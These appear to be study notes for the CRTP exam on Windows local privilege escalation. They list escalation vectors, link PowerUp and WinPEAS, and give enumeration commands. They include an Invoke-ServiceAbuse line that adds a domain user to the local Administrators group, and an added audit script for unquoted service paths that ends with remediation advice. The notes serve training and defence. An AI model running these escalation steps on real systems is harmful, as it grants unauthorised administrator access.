# Local Privilege Escalation

{% hint style="info" %}
The CRTP exam consists of 5 target servers in addition to a foothold student machine.\
The goal is OS-level command execution on all 5 targets, no matter what privileges the compromised user holds.
{% endhint %}

## Vectors

There are various ways of locally escalating privileges on a Windows box:

* Missing patches – Automated deployment and AutoLogon passwords in clear text
* AlwaysInstallElevated (any user can run an MSI as SYSTEM)
* Misconfigured services – DLL hijacking and more
* NTLM relaying a.k.a. "Won't Fix"

This guide offers a sufficiently comprehensive overview of the course material on local privilege escalation:

{% embed url="https://github.com/0xStarlight/CRTP-Notes/blob/main/2-Local-Priv-Esc/1-Local-PrivEsc.md" %}

## Tools

### PowerUp

{% embed url="https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1" %}

### WinPEAS

{% embed url="https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS" %}

### Privesc

{% embed url="https://github.com/enjoiz/Privesc" %}

### Automated checks

```powershell
# PowerUp
Invoke-AllChecks

# winPEAS
winPEASx64.exe 

# Privesc
Invoke-PrivEsc
```

## Services

{% tabs %}
{% tab title="PowerUp" %}
Find vulnerable service configurations

```powershell
# Get services with unquoted paths and spaces
Get-ServiceUnquoted -Verbose

# Get services where current user can write to binary path
Get-ModifiableServiceFile -Verbose

# Get the services whose configuration current user can modify
Get-ModifiableService -Verbose
```

Abuse a modifiable service to add a domain user to the local Administrators group

```powershell
Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\studentx' -Verbose
```

{% endtab %}
{% endtabs %}
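To see what `Get-ServiceUnquoted` is actually checking, here is an added audit script (not part of the original notes or of PowerUp) that enumerates services with unquoted, space-containing binary paths, derives each intermediate path the Service Control Manager would try first, and reports whether the current user can create a file in that directory. The function name `Get-UnquotedServicePathAudit` is my own; run it from a non-elevated session to see what a standard user could reach.

```powershell
# Added example, not from the original notes or PowerUp: audit services whose
# binary path is unquoted and contains spaces, and report which of the
# intermediate "C:\Program.exe"-style locations that the Service Control
# Manager would try first are file-writable by the current user.
function Get-UnquotedServicePathAudit {
    [CmdletBinding()]
    param()
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $svc  = $_
        $path = $svc.PathName
        # Skip services with no path, quoted paths, or no executable in the path
        if ([string]::IsNullOrWhiteSpace($path) -or $path.StartsWith('"')) { return }
        $exeEnd = $path.IndexOf('.exe', [StringComparison]::OrdinalIgnoreCase)
        if ($exeEnd -lt 0) { return }

        # Keep only the executable portion (drop any service arguments after it)
        $exePart = $path.Substring(0, $exeEnd + 4)
        if ($exePart -notmatch '\s') { return }

        # Every space yields one candidate path tried before the real binary
        $tokens = $exePart -split '\s+'
        $candidates = for ($i = 1; $i -lt $tokens.Count; $i++) {
            ($tokens[0..($i - 1)] -join ' ') + '.exe'
        }

        foreach ($candidate in $candidates) {
            $parent   = Split-Path -Path $candidate -Parent
            $writable = $false
            if (Test-Path -LiteralPath $parent -PathType Container) {
                # Probe file-creation rights by writing and removing a temp file
                $probe = Join-Path $parent ([IO.Path]::GetRandomFileName())
                try {
                    New-Item -Path $probe -ItemType File -ErrorAction Stop | Out-Null
                    Remove-Item -LiteralPath $probe -Force
                    $writable = $true
                } catch { }
            }
            [PSCustomObject]@{
                Service        = $svc.Name
                RunsAs         = $svc.StartName
                PathName       = $path
                CandidateExe   = $candidate
                ParentWritable = $writable
            }
        }
    }
}

# Show only the findings a standard user could actually act on
Get-UnquotedServicePathAudit | Where-Object ParentWritable | Format-Table -AutoSize
```

A finding with `ParentWritable` set to `True` on a service that runs as `LocalSystem` is the condition the course describes; the fix is to quote the `ImagePath` and tighten the directory ACL.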
